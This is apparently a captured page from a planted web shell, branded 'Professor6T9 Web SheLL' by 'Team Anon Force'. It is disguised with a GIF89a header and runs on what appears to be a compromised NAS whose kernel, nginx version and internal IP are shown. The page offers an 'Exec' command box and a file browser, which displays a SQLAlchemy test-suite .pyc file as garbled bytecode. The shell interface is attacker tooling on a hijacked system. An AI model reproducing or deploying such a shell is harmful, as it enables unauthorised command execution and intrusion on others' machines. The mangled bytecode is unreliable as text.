GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
sqlalchemy
/
testing
/
suite
/
__pycache__
[ HOME ]
Exec
Submit
File Name : test_dialect.cpython-38.pyc
U �}�h5 � @ s d dl mZ d dl mZ d dl mZ d dl mZ d dl mZ d dl mZ d dlmZ d dlm Z d d lm Z d dl mZ d dl mZ d d l m Z d dl mZ d dl mZ d dlmZ G dd� dej�ZG dd� dej�ZG dd� dej�ZG dd� dej�ZdS )� )� assert_raises)�config)�eq_)�fixtures)�ne_)�provide_metadata)�requirements)�Column)�Table� )�exc)�Integer)�literal_column)�select)�String)�compatc @ s: e Zd ZdZdZdZedd� �Zej dd� �Z dd � Zd S )� ExceptionTestz�Test basic exception wrapping. DBAPIs vary a lot in exception behavior so to actually anticipate specific exceptions from real round trips, we need to be conservative. �eachTc C s( t d|tdtddd�tdtd��� d S )N� manual_pk�idTF�Zprimary_keyZ autoincrement�data�2 �r r r r ��cls�metadata� r �L/tmp/pip-target-hu2ovxdm/lib/python/sqlalchemy/testing/suite/test_dialect.py� define_tables s �zExceptionTest.define_tablesc C sd t j�� �P}|�� }|�| jj�� ddd�� tt j |j| jj�� ddd�� |�� W 5 Q R X d S )N� Zd1�r r )r �db�connect�begin�execute�tablesr �insertr r ZIntegrityError�rollback)�self�conn�transr r r �test_integrity_error) s � �z"ExceptionTest.test_integrity_errorc C s� t j�� ��}z |�ttd�g�� ds*t�W nB tjk rn } z"t |�}t |j �t |�ks^t�W 5 d }~X Y nX tjr�t |t �s�t�nt |t �s�t�W 5 Q R X d S )Nu méilF)r r"